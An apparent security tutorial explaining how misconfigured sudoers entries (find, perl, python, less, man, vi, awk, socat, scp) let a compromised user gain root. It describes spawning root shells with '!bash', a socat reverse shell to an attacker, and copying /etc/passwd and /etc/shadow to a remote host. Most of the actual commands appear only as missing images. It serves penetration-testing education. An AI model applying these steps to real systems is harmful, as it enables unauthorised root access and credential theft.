Linux Privilege Escalation with Misconfigured Sudo
Source https://www.hackingarticles.in
Last updated
Source https://www.hackingarticles.in
Last updated
Let’s Start with Theoretical Concept!!
In Linux/Unix, a sudoers file inside /etc is the configuration file for sudo rights. We all know the power of sudo command, the word sudo represent Super User Do root privilege task. Sudoers file is that file where the users and groups with root privileges are stored to run some or all commands as root or another user. Take a look at the following image.
When you run any command along with sudo, it needs root privileges for execution, Linux checks that particular username within the sudoers file. And it concluded, that the particular username is in the list of sudoers file or not, if not then you cannot run the command or program using the sudo command. As per sudo rights the root user can execute from ALL terminals, acting as ALL users: ALL group, and run ALL command.
GTFOBins is the prime resource for finding the appropriate methods for the binaries.
GTFOBins: https://gtfobins.github.io/
Sudoer File Syntax
If you (root user) wish to grant sudo right to any particular user then type visudo command which will open the sudoers file for editing. Under “user privilege specification” you will observe default root permission “root ALL=(ALL:ALL) ALL” BUT in actual, there is Tag option also available which is optional, as explained below in the following image.
Consider the given example where we want to assign sudo rights for user:raaz to access the terminal and run copy command with root privilege. Here NOPASSWD tag that means no password will be requested for the user.
NOTE:
(ALL:ALL) can also represent as (ALL)
If you found (root) in place of (ALL:ALL) then it denotes that user can run the command as root.
If nothing is a mention for user/group then it means sudo defaults to the root user.
On other hands start your attacking machine and first compromise the target system and then move to privilege escalation phase. Suppose you successfully login into victim’s machine through ssh and want to know sudo rights for the current user then execute below command.
In the traditional method, PASSWD option is enabled for user authentication while executing the above command and it can be disabled by using NOPASSWD tag. The highlighted text is indicating that the current user is authorized to execute all command. Therefore we have obtained root access by executing the command.
Again compromise the target system and then move for privilege escalation stage as done above and execute the below command to view sudo user list.
Here you can perceive the highlighted text which is representative that the user raaz can run all command as root user. Therefore we can achieve root access by performing further down steps.
Note: Above both methods will ask user’s password for authentication at the time of execution of sudo -l command because by Default PASSWD option is enabled.
Again compromised the Victim’s system and then move for privilege escalation phase and execute below command to view sudo user list.
At this point, you can notice the highlighted text is indicating that the user raaz can run any command through find command. Therefore we got root access by executing below commands.
At the time of privilege, escalation phase executes below command to view the sudo user list.
Now you can observe the highlighted text is showing that the user raaz can run Perl language program or script as root user. Therefore we got root access by executing Perl one-liner.
After compromising the target system and then move for privilege escalation phase as done above and execute the below command to view the sudo user list.
At this point, you can perceive the highlighted text is indicating that the user raaz can run Python language program or script as root user. Thus we acquired root access by executing Python one-liner.
For the privilege, escalation phase executes below command to view the sudo user list.
Here you can observe the highlighted text which is indicating that the user raaz can run less command as root user. Hence we obtained root access by executing the following.
It will open requested system file for editing, BUT for spawning root shell type !bash as shown below and hit enter.
You will get root access as shown in the below image.
After the compromise, the target system then moves for privilege escalation phase as done above and execute the below command to view the sudo user list.
At this phase, you can notice the highlighted text is representing that the user raaz can run AWK language program or script as root user. Therefore we obtained root access by executing AWK one-liner.
For privilege escalation and execute below command to view sudo user list.
Here you can observe the highlighted text is indicating that the user raaz can run man command as root user. Therefore we got root access by executing the following.
It will be displaying Linux manual pages for editing, BUT for spawning root shell type !bash as presented below and hit enter, you get root access as done above using Less command.
You will get root access as shown in the below image.
After compromising the target system and then move for privilege escalation phase as done above and execute the below command to view the sudo user list.
Here you can observe the highlighted text which is indicating that user raaz can run vi command as root user. Consequently, we got root access by executing the following.
Thus, It will open vi editors for editing, BUT for spawning root shell type !bash as shown below and hit enter, you get root access as done above using Less command.
You will get root access as shown in the below image.
NOTE: sudo permission for less, nano, man, vi and man is very dangerous as they allow the user to edit system file and lead to Privilege Escalation.
There are maximum chances to get any kind of script for the system or program call, it can be any script either Bash, PHP, Python or C language script. Suppose you (system admin) want to give sudo permission to any script which will provide bash shell on execution.
For example, we have some scripts which will provide root terminal on execution, in given below image you can observe that we have written 3 programs for obtaining bash shell by using different programing language and saved all three files: asroot.py, asroot.sh, asroot.c (compiled file shell) inside bin/script.
NOTE: While solving OSCP challenges you will find that some script is hidden by the author for exploit kernel or for root shell and set sudo permission to any particular user to execute that script.
Now allow raaz to run all above script as root user by editing sudoers file with the help of the following command.
For the privilege, escalation phase executes below command to view the sudo user list.
The highlighted text is indicating that the user raaz can run asroot.sh as the root user. Therefore we got root access by running asroot.sh script.
Execute below command for privilege escalation to view sudo user list.
At this time the highlighted text is showing that user raaz can run asroot.py as the root user. Therefore we acquired root access by executing the following script.
After compromising the target system and then move for privilege escalation and execute below command to view the sudo user list.
Here you can perceive the highlighted text is indicating that the user raaz can run shell (asroot.c compiled file) as the root user. So we obtained root access by executing the following shell.
As we have seen above, some binary programs with sudo right are helpful in getting root access. But apart from that, there are some application which can also provide root access if owned sudo privilege such as FTP or socat. In given below command we have assign sudo rights to the following program which can be run as root user.
At the time of privilege escalation phase, executes below command to view sudo user list.
As we can observe user: raaz has sudo rights for env, FTP, SCP, and Socat, now let’s try to get root access through them one-by-one.
Now let’s try to get root access through FTP with the help of following commands:
Now let’s try to get root access through socat with the help of following commands. Execute below command on the attacker’s terminal in order to enable listener for reverse connection.
Then run the following command on victim’s machine and you will get root access on your attacker machine.
As we know sudo right is available for SCP but it is not possible to get bash shell directory as shown above because it is a means of securely moving any files between a local host and a remote host. Therefore we can use it for transferring those system files which requires root permission to perform read/write operation such as /etc/passwd and /etc/shadow files.
Syntax: scp SourceFile user@host:~/path of the directory
Now let’s confirm the transformation by inspecting remote directory and as you can observe we have successfully received passwd and shadow files in our remote pc.